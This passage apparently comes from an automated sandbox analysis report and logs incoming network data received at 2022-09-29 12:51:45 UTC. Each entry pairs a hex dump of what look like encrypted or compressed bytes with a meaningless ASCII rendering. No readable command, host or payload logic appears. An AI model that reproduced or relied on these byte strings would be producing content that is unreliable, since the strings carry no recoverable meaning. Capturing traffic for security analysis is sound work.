                                                                                                                                                2022-09-29 12:51:45 UTC21609INData Raw: bb 56 19 00 12 69 95 6b 47 8e f3 7c ce d5 30 cf 0a 8d d8 8d 90 c8 70 80 02 20 32 8f 05 ae 3a 2f 8d c9 5c b9 77 3d 22 9d d6 d4 a2 7d c6 2d 4a eb 0c 7e be b6 b6 75 c4 ca e4 69 72 7b 48 fb 91 41 96 80 95 53 5e 65 9e f2 ca 06 fb 79 13 4b 3c 76 20 19 f1 fc 8f 14 5b 65 c3 5c e5 04 5b bc 56 20 cb ea b8 01 23 d2 fc ae fd 34 2b 22 c2 f6 cc df f9 a2 f0 39 f9 61 ad 19 1b ef d7 82 eb 42 9a d1 2c 95 4d 8a 69 65 4f c1 57 69 7e f3 dd 70 59 a4 ef c4 84 06 14 26 b9 0a 3e 4d 2a 5d 8e 1d fd b5 8a 22 d2 07 8f 3d 69 b3 2a 89 08 ae 0c a6 bc 36 9f b3 54 5e 3f 56 4d 5e ae 1a 25 07 1f 06 3a 0c fd 9c 27 c5 a4 05 77 79 1e d3 df b6 da 7e 43 67 df bc d2 c0 66 ce 03 c0 35 3c 5f 07 ba 20 d7 9b 89 3a ce 0d 75 2a 46 d6 f0 6a a3 25 67 3b d8 37 82 c8 82 a6 0b 48 1e 12 52 3f 4a 98 19 bf 75
                                                                                                                                                Data Ascii: VikG|0p 2:/\w="}-J~uir{HAS^eyK<v [e\[V #4+"9aB,MieOWi~pY&>M*]"=i*6T^?VM^%:'wy~Cgf5<_ :u*Fj%g;7HR?Ju
                                                                                                                                                2022-09-29 12:51:45 UTC21625INData Raw: 5d df 47 35 94 54 21 bf 2c 6c b0 94 4f 48 13 15 af 92 2b 1e 47 42 ce 2c 02 6f a9 ff cb d1 48 6c cf f2 9e a5 42 b0 d1 4f ee b7 3e e1 83 e2 a1 87 26 98 be 5f 90 65 84 69 66 80 57 ac ce 0b f0 eb 6d 62 d5 76 d7 c7 6c 79 6f 70 d4 82 15 00 b4 58 6f bb 6f a1 c2 46 51 5c d1 a4 4c 10 6a 74 5b a8 ff 23 1f 32 2a 67 b4 57 6e 96 30 7f d2 55 b7 1b db fe 63 da 0c 85 4b bd dd 3f cc 33 26 35 71 aa 73 13 6a af 13 cb ff 45 b0 58 0b b0 73 74 35 0b 87 5b 99 0e 64 d1 ac 89 23 ea fc 22 c0 e5 79 65 af 04 8a 66 1f 62 b5 55 fb 86 7c 15 09 74 ef a2 23 9d ed 63 27 c2 37 82 29 9d 1f 32 eb 1c 95 1c f7 49 c8 64 6c ae 77 5a 7b 16 bb 31 81 02 56 b6 86 e8 9a b2 c7 75 4f e8 63 ae a5 79 44 c3 1b a2 46 b4 83 5a b8 ff 70 ba 5a 41 8e 0d 7b ad dc 0d ca 20 9d 9b 98 81 84 5a 5c 8c 69 74 0c 50 aa
                                                                                                                                                Data Ascii: ]G5T!,lOH+GB,oHlBO>&_eifWmbvlyopXooFQ\Ljt[#2*gWn0UcK?3&5qsjEXst5[d#"yefbU|t#c'7)2IdlwZ{1VuOcyDFZpZA{ Z\itP
                                                                                                                                                2022-09-29 12:51:45 UTC21641INData Raw: 99 db 4c 67 81 4a 7c c4 d9 57 c3 47 4d 1b 8d 9c 8a 0a ed 8a a4 ce cc 30 95 dd c4 27 57 49 5f ad cd 0b ba cc 32 19 03 2b ab 73 e6 16 1c c1 d4 ee 1a 6a 5c cb 05 1a f7 83 56 99 66 f4 2b b6 7c 69 07 80 0e 68 0b e7 58 54 96 db a5 43 4a 22 20 34 b8 5b b5 98 ab 65 f4 4e 75 0d 7d 69 2f 0e bd b8 7e 00 65 ee ce dd 70 af 48 52 4e 79 6f 3f 7e 5d d2 29 dc 4d 40 80 8d 34 61 0d 08 08 79 f4 3a 3e 32 b4 7c af c2 c6 c9 79 6f 5e d4 48 25 6e 88 d8 64 da 29 11 1a 66 1c e9 27 6b ce 98 22 47 71 68 1d 8f 72 62 8d 7a 91 a8 36 1c 80 a5 fc 3c 41 95 35 77 12 8d 6b 03 46 26 54 aa c8 4f 78 18 ef 9e f9 b9 9a 9c c0 ee 0c 8d be 9d 8c ce 34 44 c6 12 51 21 b9 5c 29 db 73 e8 bb f6 5a 7b 12 9d f0 7b df 0a 9b 12 02 62 ef 5c cb 6d 27 9f 99 38 58 d9 77 0e ca 5d a1 b7 6e c1 96 77 47 10 0b fa 4b
                                                                                                                                                Data Ascii: LgJ|WGM0'WI_2+sj\Vf+|ihXTCJ" 4[eNu}i/~epHRNyo?~])M@4ay:>2|yo^H%nd)f'k"Gqhrbz6<A5wkF&TOx4DQ!\)sZ{{b\m'8Xw]nwGK
                                                                                                                                                2022-09-29 12:51:45 UTC21657INData Raw: 26 55 11 22 3e 80 71 82 9c 68 e4 34 91 ec a5 67 09 7e 5e f1 53 bc be 73 f5 d2 6e a8 87 40 c5 85 d1 64 d4 47 8e 3e 1b fe fa 39 da 10 da 3e b3 a5 c2 cb e4 5d 7c 4e 82 cd 7c 01 45 81 93 67 87 5a 97 3e 84 28 7c 4b 97 25 21 30 71 9e ff 11 40 c7 b9 da 69 dc 85 eb b1 a8 4f 8a 01 86 ca e5 33 c9 2b c4 cb 00 ba 3a 14 ad 76 a7 7a d3 71 79 a0 c6 d3 93 10 2b 7a 7a 6a 99 73 a5 db 42 98 b5 71 87 94 99 fc f6 26 61 ad c7 87 75 02 6d 46 b5 a1 15 fc 95 de 3b 75 fe c4 f9 91 63 96 a7 d7 c7 5e a0 05 9d 75 a0 0e 44 de 8f e3 36 2f e6 c6 52 fc d9 0d 71 a8 df b1 18 1b cd 00 43 f8 84 98 f3 80 b5 db a7 23 84 34 9e 31 c5 f9 32 79 4a ec 60 b6 40 25 9f 40 39 95 36 14 c4 4b 01 4d df 4d 1f 54 a8 c9 bc b0 d5 2f 1d cd 58 6b eb 2e 02 1c 77 b1 5b b8 23 96 38 12 78 85 7c 60 48 27 ac 20 af 2f
                                                                                                                                                Data Ascii: &U">qh4g~^Ssn@dG>9>]|N|EgZ>(|K%!0q@iO3+:vzqy+zzjsBq&aumF;uc^uD6/RqC#412yJ`@%@96KMMT/Xk.w[#8x|`H' /
                                                                                                                                                2022-09-29 12:51:45 UTC21673INData Raw: 96 be 62 60 53 2d 7f 76 cc 5b 30 c2 67 ca 7e 3e d6 b6 91 11 fe 92 a9 02 38 78 04 f9 21 aa 6e 1e 3c 07 81 2f c2 31 26 ec bc d2 7c 59 0e c0 12 76 24 74 fd 1c 9c 8e c8 57 50 e0 ed 24 da 9c 22 54 d1 19 77 e7 b1 2a d3 d8 85 79 fb c4 16 29 c2 bd 56 8c 8a 62 2e 04 fd af 24 12 17 f7 28 9c c8 9c 19 bf 62 82 42 d8 d6 60 0f 6b 19 32 5f d2 34 4f 5e 0f d0 9b bd fa c5 ab c3 9c c2 a1 02 76 7f 77 43 eb f1 04 0d d0 17 75 0a 55 be a7 33 07 ad cf 0c fc 8b aa 58 c3 49 46 a5 08 cc f9 28 75 ba 88 73 61 a8 aa 97 ed d0 0c 13 4a 55 e7 2f ae 24 6d 02 f7 90 b2 cb 39 77 a4 22 ea b1 b1 e6 53 e9 7f a1 3a 6d 5e df 0c 3c 9d 60 1f 81 f5 e9 f6 cc 2a 34 ab 89 6e 03 49 d2 74 10 20 0e 95 9b 75 a0 e7 6b f3 c4 43 ad 71 a1 99 e0 6b 46 a3 59 bc 9a a7 47 2b af f0 af 65 4d 3e 9d 80 c2 41 5a 02 c5
                                                                                                                                                Data Ascii: b`S-v[0g~>8x!n</1&|Yv$tWP$"Tw*y)Vb.$(bB`k2_4O^vwCuU3XIF(usaJU/$m9w"S:m^<`*4nIt ukCqkFYG+eM>AZ
                                                                                                                                                2022-09-29 12:51:45 UTC21689INData Raw: 1c 2a b8 68 5a 91 8c 8f cd 52 a2 88 ee 96 0d ae a0 0f 95 61 11 76 61 0f dd 36 66 9b 25 3d 5c 43 b9 fc f6 1f 8a f1 e3 e7 6e 40 cf 96 82 41 e3 a4 cf d3 aa 0e bc d4 ba d0 9a a0 9e 45 9b 75 ce 46 74 dc 8a 9a 7c 1d 51 dd f9 75 6b bd 41 26 b2 0f 70 e5 39 72 42 d2 5c d2 77 2a 6e d4 16 4e 94 c8 14 60 de 18 98 37 19 0b e8 bc 70 e7 51 b3 f9 45 17 17 b2 30 30 86 2c 84 98 16 9c 6b 9f a3 bb d4 f0 51 a0 9e d2 c0 84 dd b5 8d e2 7e a5 6c 4e da 58 c4 fa 79 e1 50 d4 f8 3b 0f 05 40 85 b1 07 df 39 33 84 1d 6e b2 f4 8c 07 b8 7b 6b 3e 73 60 c6 31 00 18 d6 b7 10 19 70 22 4e 12 89 ed 32 9a 4c 63 43 9c 85 39 6a 8a a5 55 be b8 3d 38 68 7d 90 16 a3 e1 a7 15 69 2c 24 58 d0 6d ae 10 8f 90 6f e2 e4 ee 25 14 c0 e4 78 e8 46 a9 52 bc 99 c1 39 b3 27 9a 37 a5 ff 5e 49 8b c0 28 55 90 ff e8
                                                                                                                                                Data Ascii: *hZRava6f%=\Cn@AEuFt|QukA&p9rB\w*nN`7pQE00,kQ~lNXyP;@93n{k>s`1p"N2LcC9jU=8h}i,$Xmo%xFR9'7^I(U
                                                                                                                                                2022-09-29 12:51:45 UTC21705INData Raw: 78 8a fb d8 9e 66 a3 71 88 68 5b 1a c0 72 55 9b a9 8e a3 76 4a 62 47 49 04 74 20 a2 6f 07 e1 d3 e0 15 c3 0f 1f 96 af fe ab 88 d0 14 38 83 ba d6 9d 2a 73 2e 66 0f 69 a6 b2 94 d9 5a 5d fe 31 3e 93 b8 c9 56 61 bf b5 7a ff 27 1f b9 2e 16 75 22 af 45 2f ae d4 81 f4 ca 2a 05 2a b7 c7 ea b5 50 4e 77 64 6f 2c 9c 24 9b 5f 66 b9 48 fe e3 79 48 07 ee e5 ab f3 1b 6a fc 18 6f ef 29 99 8a bb 1d 80 9b b0 1c a7 c9 54 ab 82 49 14 b2 51 07 f4 31 b5 fa 9a 6d 19 23 e8 1e a6 aa db e1 03 32 8d 28 c5 2b da 5e a2 4a 93 93 61 dc bd 23 b7 05 2d 16 4f 21 49 2d 9d 51 2d 7c 0d bc 64 72 cb 21 75 74 3b 67 0a 24 0c 8b 12 2e 48 c8 4b 65 47 c8 eb 9f ca c1 cf 9a 5c f1 1d 33 b3 86 2e 5b ce cb c3 e1 8f 8b 4c c6 84 f1 7c 61 af 1f 83 8e 7a cd 9b 4d dd 83 cf d2 9a bc 7d f0 8f 46 83 8e ae b6 06
                                                                                                                                                Data Ascii: xfqh[rUvJbGIt o8*s.fiZ]1>Vaz'.u"E/**PNwdo,$_fHyHjo)TIQ1m#2(+^Ja#-O!I-Q-|dr!ut;g$.HKeG\3.[L|azM}F
                                                                                                                                                2022-09-29 12:51:45 UTC21721INData Raw: 3d c4 99 a1 8f c2 8e 04 02 a5 59 99 09 e8 35 41 70 a6 0c 60 9c fb 5d 09 e0 f8 d5 20 50 2f 20 9a be a8 3c 8c 66 b9 bf 4c 65 73 3b e8 1d 47 25 19 74 69 13 56 a9 b0 8a d0 1f 06 b8 c0 52 86 45 ac e5 98 70 39 59 d8 ec d5 20 66 f7 d8 4d e0 da 38 04 18 72 71 de af 9c 4e bc 17 23 10 41 62 6e 8b 1c 97 17 f4 be 83 6f c8 ea 6e 55 e0 25 f1 bf 37 e0 32 96 c0 16 f2 61 e3 8f 2e 4c 22 5a 9a 68 31 23 d4 20 84 e0 24 38 58 a0 58 26 09 6e a2 42 55 db 8e 90 dd b6 04 e4 da 09 0d ac 28 13 cb d1 37 24 b6 ee 1b 7d 6b 1e 13 16 79 99 ed a3 90 25 e3 5e cb 62 65 28 ea 73 1a b4 5e ac 82 ee f4 47 b2 c5 04 5c 10 97 c8 f8 26 c6 96 ca 4a cd 1c 4d ef 8d 90 87 80 ba d5 c2 22 ae a3 50 63 b6 63 99 36 ea 5e d1 a6 5c 37 0d 96 b5 72 db 71 e3 38 6b b7 67 2b 2c 6b 57 1e 06 dc bf 3e 89 43 26 08 63
                                                                                                                                                Data Ascii: =Y5Ap`] P/ <fLes;G%tiVREp9Y fM8rqN#AbnonU%72a.L"Zh1# $8XX&nBU(7$}ky%^be(s^G\&JM"Pcc6^\7rq8kg+,kW>C&c
                                                                                                                                                2022-09-29 12:51:45 UTC21737INData Raw: ad 64 fa ac a4 31 5a c9 3c 62 83 4c 1d 2e ab f9 27 19 ce 7c 0e 73 90 92 9c 29 3e 54 ec ef fa b3 82 73 93 e0 3d 28 ed 26 5c dc 9c b1 1c 09 b1 79 c9 42 23 92 b1 3f 2f ba f3 c3 dd 9d d7 34 16 e0 b9 6b a2 f6 9e 58 be 71 27 9d 2b ad ff f4 49 5e 9e 07 a1 ba 36 87 7d bc 61 c7 86 1f 50 18 e2 85 4d 4f ea 29 10 23 bf aa e6 dd 84 7b cd 17 70 91 25 50 34 ab 19 00 b5 06 14 e3 3e b1 0c 86 9c 78 f1 91 81 f3 fb 6d 51 30 73 74 bf fb 53 7e 75 9d 3a c9 aa da 52 02 4c 62 be c8 e5 2c 03 d9 36 7f 4e cc aa d6 42 a6 cb 5e e5 bb 54 84 b0 d7 e7 7d 5a 75 d6 46 9f e2 38 d0 35 30 4c 7a 5c 16 ad 35 79 35 37 4c 83 1d f3 12 b8 9f b5 af d3 ae 46 f1 dc 36 d2 08 46 d0 10 1d 48 9e dd f8 c8 1b a0 f2 43 60 87 c2 47 f4 b5 d8 4f 8f b7 0f cd d9 51 a1 1b 61 0d f0 67 a7 35 3d b6 26 25 c8 4b 0b 0b
                                                                                                                                                Data Ascii: d1Z<bL.'|s)>Ts=(&\yB#?/4kXq'+I^6}aPMO)#{p%P4>xmQ0stS~u:RLb,6NB^T}ZuF850Lz\5y57LF6FHC`GOQag5=&%K
                                                                                                                                                2022-09-29 12:51:45 UTC21753INData Raw: e8 50 b7 df 6e fd 17 45 10 73 f4 c6 78 33 7f fe 9c 17 e5 02 49 4a 85 e3 e0 a7 3f 43 91 d3 f6 42 fd 7d ac 60 82 9c 48 ea d7 3c 4d f1 96 35 c4 15 8b 75 29 c0 78 9d 6f 41 98 e7 01 a2 87 95 ca ea e9 4f 66 06 e8 ec 2c 8b 02 e5 6c 7c 0c 2a 0c 01 22 e4 e5 8f 3f dc d4 f6 7e 3e 12 ac 70 4e e0 ae c2 e1 50 85 d8 28 53 35 3b de 52 36 2a 8e 91 fe 87 7e a7 ca 2b 7e e8 96 85 86 87 79 b6 3d 89 60 97 48 03 e6 fa fc ba 1f c5 66 81 d9 bb a4 77 25 e5 e9 cf 2a e5 14 bb ab 17 60 6b 2a d8 2f 85 12 58 1c 1a 35 2f 7f b5 3c 7f f0 8e ab 88 8f 43 2c fb 74 43 c8 06 de ba ce ec aa 4a e7 7e 63 23 98 23 75 13 60 47 f3 38 c7 23 98 ce 88 82 b3 9c 18 67 d2 88 1f d2 c1 37 4b 2a b2 59 8c ad e1 12 18 ec e6 57 e6 6d 27 e6 90 d0 3e 31 25 7c 36 54 10 16 e2 f8 3b d9 4b a3 5a c5 d9 e1 76 82 04 a5
                                                                                                                                                Data Ascii: PnEsx3IJ?CB}`H<M5u)xoAOf,l|*"?~>pNP(S5;R6*~+~y=`Hfw%*`k*/X5/<C,tCJ~c##u`G8#g7K*YWm'>1%|6T;KZv
                                                                                                                                                2022-09-29 12:51:45 UTC21769INData Raw: 09 9b 48 41 aa 1e 5d 74 c0 0f 83 94 89 3e 25 bb 21 ea 8e 6c 59 70 93 53 90 e4 d4 0d ad 6e 4b 76 17 45 aa a9 56 27 1f e2 5b 48 ac 87 6d 8b 07 e5 d8 24 fc 89 7c 8f db 92 60 4e 4d 35 5e cf e7 4a 67 ea 2c 81 7a 68 3c c3 75 07 fc 13 fe 13 0a fa 2a 76 21 9e 18 3b c0 b4 c6 a2 dd f8 7c fe 25 71 ef 6a 43 ec 09 c9 48 1c 26 e4 88 be 5c 8b a7 8d 35 93 94 1a fd 14 09 fc 05 d5 99 dd c2 b3 43 44 06 35 b8 60 43 16 da b9 df 82 79 72 73 05 53 f5 28 79 0a c5 07 29 49 76 7e 9e 2c ee 55 fe bc 09 07 d3 5e 4a 2b f0 a1 ed 47 1d 0e c3 cf 3e 3a 28 ec 17 c4 16 08 ff c2 bd 59 28 2e 18 26 7a f2 fa 82 39 3c d1 f3 2a ce 66 cd 88 0b 7f af b0 e4 78 df 3e c3 b3 55 34 fc 55 6a 5b 09 58 bc a5 fe 23 a9 5c 77 d5 45 82 96 f5 c6 c6 62 6c 23 cc be 0d 22 87 44 fd 43 ac 7a 6f 76 dc ca 62 f4 64 a7
                                                                                                                                                Data Ascii: HA]t>%!lYpSnKvEV'[Hm$|`NM5^Jg,zh<u*v!;|%qjCH&\5CD5`CyrsS(y)Iv~,U^J+G>:(Y(.&z9<*fx>U4Uj[X#\wEbl#"DCzovbd
                                                                                                                                                2022-09-29 12:51:45 UTC21785INData Raw: f6 5e 4e b3 09 f2 bd aa 25 0e b0 50 34 98 97 8c a4 50 48 41 8a 24 0f 68 70 3e a6 f2 f9 75 d6 73 ad fe e3 51 13 f3 73 5c 13 ca c4 9b 6c a6 63 eb 42 57 db f1 f7 0a 29 56 1f f5 6f 8f d8 25 fc 85 02 0e 29 19 68 b5 c6 9f 14 6d d7 d7 75 c8 d8 f8 45 33 27 6d 6b 2e 0f d5 ac 1f 36 77 0d a9 83 df 7c f0 77 81 b5 db e3 4b a9 9b 6f d3 99 d6 ff 88 0d dc a8 67 af 97 4d 5a c0 2a 61 13 fe be 04 e8 73 07 fa a9 49 ac da a3 90 da 3b 1d 14 12 59 f6 04 7e d9 9a 78 f6 0a 50 9d 23 98 fc 7b a7 51 41 84 17 34 f2 af 06 f6 8e 33 67 d8 28 45 4a 4e 4f 52 c7 91 cf 84 0c 74 69 e6 c2 8e 96 61 cb e5 6a 0b 87 5f 66 83 d7 69 9e d4 2e 11 95 7b 83 dd d8 22 09 97 60 08 2a 8a 83 64 7f a3 99 09 c0 4f ac f2 1f 88 9b 41 47 3a 2f 44 74 92 d3 89 45 d7 a2 df 10 6a f2 16 a2 47 6d 13 e9 48 e8 f2 c6 de
                                                                                                                                                Data Ascii: ^N%P4PHA$hp>usQs\lcBW)Vo%)hmuE3'mk.6w|wKogMZ*asI;Y~xP#{QA43g(EJNORtiaj_fi.{"`*dOAG:/DtEjGmH
                                                                                                                                                2022-09-29 12:51:45 UTC21801INData Raw: a1 a4 55 78 87 56 17 31 a1 ed 0e 8c e4 77 07 28 07 14 3e ec aa 81 93 30 e8 b0 89 9e c0 09 b9 db 1f d6 ee 91 0c ca 04 16 c8 14 12 07 37 c9 6f 47 5d 3a 4c 69 94 a1 80 8a d1 73 48 5b 78 f1 e9 5b 8c 32 f1 71 9f c6 d8 b0 c0 9d ea c1 07 1f dc f9 07 4a e3 f8 cc 4b 75 59 ab 08 ae c2 1f 1b 53 49 b4 df 80 be df 63 71 22 ff 02 3e 3d c0 da a8 f2 7d 2c ba a6 49 db 9d 81 9a be 39 a5 48 ef bd bb 82 20 37 4c 89 b5 68 41 34 bd 62 44 86 77 2d 68 17 f8 e0 c9 a0 43 89 7a 1c 8f 86 12 c3 5c 3a 69 cf e8 1e e6 d5 85 c4 04 be ab a5 13 32 16 ea a6 2f c3 1e 06 cf 60 f0 2f e5 99 ba 06 a0 c5 22 2e f6 c9 07 39 31 20 07 13 a6 ae e3 70 2d 1f 0f 14 10 51 ac f8 05 49 de e1 37 a6 4e b6 c5 ce 65 c5 c6 4f 4b 6f c8 cb e5 bc 3e 2d 2e 22 59 a0 0f 34 37 11 6e ef 3e a6 97 40 2a ff 29 aa 14 cd 68
                                                                                                                                                Data Ascii: UxV1w(>07oG]:LisH[x[2qJKuYSIcq">=},I9H 7LhA4bDw-hCz\:i2/`/".91 p-QI7NeOKo>-."Y47n>@*)h
                                                                                                                                                2022-09-29 12:51:45 UTC21817INData Raw: 5d 04 21 aa 00 2e d0 f0 67 1e a9 e2 dc 95 da c0 db 2b 61 53 c2 25 92 2d 04 1a a2 2f 49 7a 39 5f e6 70 cd fb 06 40 1f 01 86 b9 29 7c 76 ca 7a 57 ba 8e 0a 19 48 9c 37 27 48 d3 d5 56 c2 ab db ab 0b 02 66 0a 1b 4c 75 71 be 00 01 fe 65 ca cf 53 6d ea 2d da 74 c2 e8 26 d4 30 0f 54 09 dc a4 ea 26 c6 56 ad 71 6e f1 e3 d0 8c 54 8a 1f e4 95 3d 90 49 38 19 94 e4 1a 52 2b 33 76 17 d2 50 20 1f 45 dc 8c 2d 89 d8 0d 1e 53 82 d2 dd 21 8e 90 b7 cf e9 59 9e 23 65 6a 88 88 26 14 f5 26 85 1b 32 42 1d 1d cf e4 a2 b8 ff 44 cf ca 97 c8 d4 70 11 e2 39 66 1f ab 98 c5 f1 19 ea 86 25 b0 91 b8 a2 d6 7a ee 7e 13 d5 e3 61 7c 9a b0 34 d3 ce a0 e9 7b f6 d5 8d f4 bf 63 8b 51 63 e2 6d 8f 71 85 1b 48 af 06 82 69 51 f2 ba 58 ff 4b d5 29 16 b5 03 a4 2b 06 a9 33 fb 92 e3 88 29 91 f9 07 16 51
                                                                                                                                                Data Ascii: ]!.g+aS%-/Iz9_p@)|vzWH7'HVfLuqeSm-t&0T&VqnT=I8R+3vP E-S!Y#ej&&2BDp9f%z~a|4{cQcmqHiQXK)+3)Q
                                                                                                                                                2022-09-29 12:51:45 UTC21833INData Raw: 2b 58 a9 11 c0 1b 13 2d 71 25 4d e0 ae c3 df 1d 91 9f 60 81 5f 95 19 f9 d4 a9 94 d2 a4 62 0c e2 63 9f b6 59 e6 dd 2d 00 4b 3d 1c 10 19 04 df 57 9f 30 b1 46 8d 6b b7 d8 54 31 42 da 5a e6 a7 69 a4 83 5c 88 58 6b 4a 9f 3b e7 2f 2e d7 be ee e0 01 aa 84 ae 09 a7 6d 7e 22 5b 80 b0 f5 35 81 52 1a 76 b5 a3 95 d5 5d 33 2b 02 0f 77 49 78 b5 08 db f4 cf 4e cd 3f 49 e8 be 36 69 cf d0 9b 53 0b bc 98 9d b6 e4 f3 d9 7c fd ca f6 10 34 89 c1 91 79 60 84 be 95 e3 c0 39 7b df cc e3 a3 fe 90 7b 98 54 f8 0d 88 d4 e0 b2 0b dd 61 90 14 4b b5 05 c8 fd 53 aa 21 f5 5e 6f a1 a9 b5 5a d5 79 41 52 60 d8 1e a3 75 ec 7a ad d8 33 c5 2f 3b fe 1d 6c 5d 7b a9 d8 3e 97 7d 29 7a b9 ef 97 93 6a 1e d5 ca 30 b5 9b cb 7d 6d 7e b5 f2 19 52 da bd ea 16 e2 dd 2c 24 d5 d5 a7 03 70 da 60 88 09 ea a7
                                                                                                                                                Data Ascii: +X-q%M`_bcY-K=W0FkT1BZi\XkJ;/.m~"[5Rv]3+wIxN?I6iS|4y`9{{TaKS!^oZyAR`uz3/;l]{>})zj0}m~R,$p`
                                                                                                                                                2022-09-29 12:51:45 UTC21849INData Raw: 35 f0 44 59 54 07 0f 2f c9 11 bf a4 d2 b6 08 6c 78 3e cf 85 c7 38 33 2d 7d dc 0d f7 64 8c 28 68 12 e2 12 b1 e6 f4 8c bf 61 57 2d a2 d4 45 20 1e 92 26 4f ec 15 64 d8 a7 69 71 17 c7 67 68 b3 4b 05 4a 82 12 6c ad d3 89 37 d9 c5 60 70 13 9f 6b b6 3f 1a c5 a8 07 58 87 f0 24 df a6 5a 9c 30 83 c8 76 39 9a 2b ce f4 94 a0 cc 52 d8 6c 50 56 cc 62 b8 5b eb 99 88 4c e5 bc 85 11 fb b7 68 1f 3b cd e5 de a5 d2 2c 6c 04 7d 05 0a a4 06 c6 fe 05 12 73 4a 47 a8 af f0 a6 5b 68 69 41 4c 57 1c 58 81 a3 7a d4 12 62 91 9c 30 52 60 f8 b5 4f 8b f8 8e 51 7b ae 75 77 eb 05 9f b0 e1 b8 c0 17 9b 96 e6 2c d8 aa bd a2 ab c6 a8 a2 d8 73 b7 88 01 4f 8a 8f ad f6 12 7b 03 a7 66 f6 cd 48 ce d2 29 9b 5c d7 3a 31 ff 8f 17 4a 4f 64 eb 60 d7 42 a1 83 bc 31 56 08 6f 88 94 42 2d a0 9b 02 5f b1 51
                                                                                                                                                Data Ascii: 5DYT/lx>83-}d(haW-E &OdiqghKJl7`pk?X$Z0v9+RlPVb[Lh;,l}sJG[hiALWXzb0R`OQ{uw,sO{fH)\:1JOd`B1VoB-_Q
                                                                                                                                                2022-09-29 12:51:45 UTC21865INData Raw: 02 70 98 7d 9b 92 a4 46 61 28 99 25 94 e8 a7 4e 0f 9b 07 f0 99 21 9f e6 64 1f dc 52 75 9c 73 2b 8a 47 a5 ef 97 7b 6a 72 2a cc 95 0e 56 75 24 18 b4 85 10 1c e8 c2 32 bf 05 d7 a7 7f 60 e9 2a c2 50 2e fe e9 6b 16 d2 0a 31 4a 10 de 1b 14 13 17 e9 bd 40 ec b6 0d b2 0a ca 7b 0d 29 a1 b1 52 c3 62 c3 2c 9b 6e 07 9c 25 d4 2b 1d 6f 6e 8c 55 ef aa 90 23 e6 da da 38 2b 9e f6 5c 7a b2 13 cd 11 64 15 f5 d9 97 fb d1 b9 1b 67 47 a2 af 4c 09 93 46 a3 b2 5c 5a e4 92 4c 05 6d 64 24 f2 ae 77 2a 62 e3 ea a5 b6 08 cf 5e 4f e0 71 e0 03 f0 70 4b 36 c4 b0 ae 95 63 24 c7 ce 18 e4 ac f6 e6 07 c2 1a 21 be 2f 27 8e 48 d8 97 19 db 83 44 3a 7e 34 77 b4 3d c6 4d 1c 04 1f ea 72 d8 86 21 b8 2e 6e 79 17 4d d9 9d e6 68 0d 35 21 0f 8a 4b 24 81 85 8f 16 af 3d 80 62 db fb cf 47 ce a0 8a 4a 5e
                                                                                                                                                Data Ascii: p}Fa(%N!dRus+G{jr*Vu$2`*P.k1J@{)Rb,n%+onU#8+\zdgGLF\ZLmd$w*b^OqpK6c$!/'HD:~4w=Mr!.nyMh5!K$=bGJ^
                                                                                                                                                2022-09-29 12:51:45 UTC21881INData Raw: 58 11 94 de 92 63 c5 17 20 51 a4 17 82 a1 1e f0 c3 40 2f e7 f6 cd 5b 2a 02 12 0d 4e 2e 85 68 0c 53 90 9e b5 3d 22 9e d3 eb a8 0f ab 79 2e 82 2c 9b 57 e6 b0 ec 60 25 97 6e 91 3b 61 16 88 85 bc 2c 09 23 0a 76 05 a0 74 48 3b 1f a6 c1 7c 7e 62 83 e8 bd 48 b6 5d de ff 76 bf 87 26 97 2d ee b4 eb 6e 60 13 8c 3f 22 ba 75 11 1c 42 1d 95 d6 6b 98 88 b7 b8 83 90 b6 87 03 12 b5 d0 98 b7 94 e8 a7 3e 41 78 07 0d 2f 74 41 33 c5 7c f4 f4 99 d2 49 51 cf 3a fe 42 bc eb d2 e7 39 7d 8e 83 77 d0 5c 8f 02 07 0f 71 0e 60 5b ff 8f 65 2e 02 52 49 31 ca c5 5a 80 3c 9d 6d f2 aa c6 ea 5e aa 2f 67 19 03 7e ed b3 c6 44 a6 9a eb 9b bc fe 45 42 b6 a1 0b f8 c4 e6 00 6f f9 e5 ce da 6a 31 bd a4 3b c5 53 8b b5 1c 99 83 e9 02 9c 5e 9c df c0 b2 88 a2 73 18 a4 96 ee 13 f2 bd b8 5d a7 cd ad 94
                                                                                                                                                Data Ascii: Xc Q@/[*N.hS="y.,W`%n;a,#vtH;|~bH]v&-n`?"uBk>Ax/tA3|IQ:B9}w\q`[e.RI1Z<m^/g~DEBoj1;S^s]
                                                                                                                                                2022-09-29 12:51:45 UTC21897INData Raw: 00 06 17 24 5e b8 8d 0e 8a d5 c8 46 dd 1f 29 ee 9f 4b c6 6e 78 72 7d f9 07 ee 2d 4f 41 b5 bb 31 15 27 a1 2e b5 1a c9 6e a9 8b f7 a3 01 08 4c 2c d2 94 c5 02 d8 80 a7 36 bb 7e 61 47 8a 99 87 c3 c6 8e db da d5 06 2f 11 7f b3 ca 93 27 da 4b 8d 07 1f 29 09 58 f7 35 e5 9e 1a bc c6 4f c4 b0 9c 71 82 f0 c2 84 e8 24 07 51 5e 20 a8 74 61 c1 a3 0d 7e 2a d4 e7 ae 25 9a d2 b2 88 0b 5e 49 d9 38 6f 66 62 be 47 2d 5e bc 83 1b 12 b2 18 a5 9a 59 89 67 a4 82 6a 45 ea b1 1a 41 35 c5 b6 8b c0 91 a6 43 2e cd 14 e9 5c cc 4b 9d 75 fb 2c d5 26 6d e0 65 51 ca 3b df f6 63 2b 7a 4d 4c 83 f9 6f a0 c3 69 d6 25 17 a5 17 6a 03 ec 15 71 75 05 63 b2 d6 8b a2 da 66 0c c4 6c bb d6 39 f9 94 1e 64 bf ee f7 be 42 33 dc d2 49 de 9e 4b 74 cc d7 66 b9 30 de 27 22 3b c3 6c c9 bc c0 d4 e4 41 2c 53
                                                                                                                                                Data Ascii: $^F)Knxr}-OA1'.nL,6~aG/'K)X5Oq$Q^ ta~*%^I8ofbG-^YgjEA5C.\Ku,&meQ;c+zMLoi%jqucfl9dB3IKtf0'";lA,S
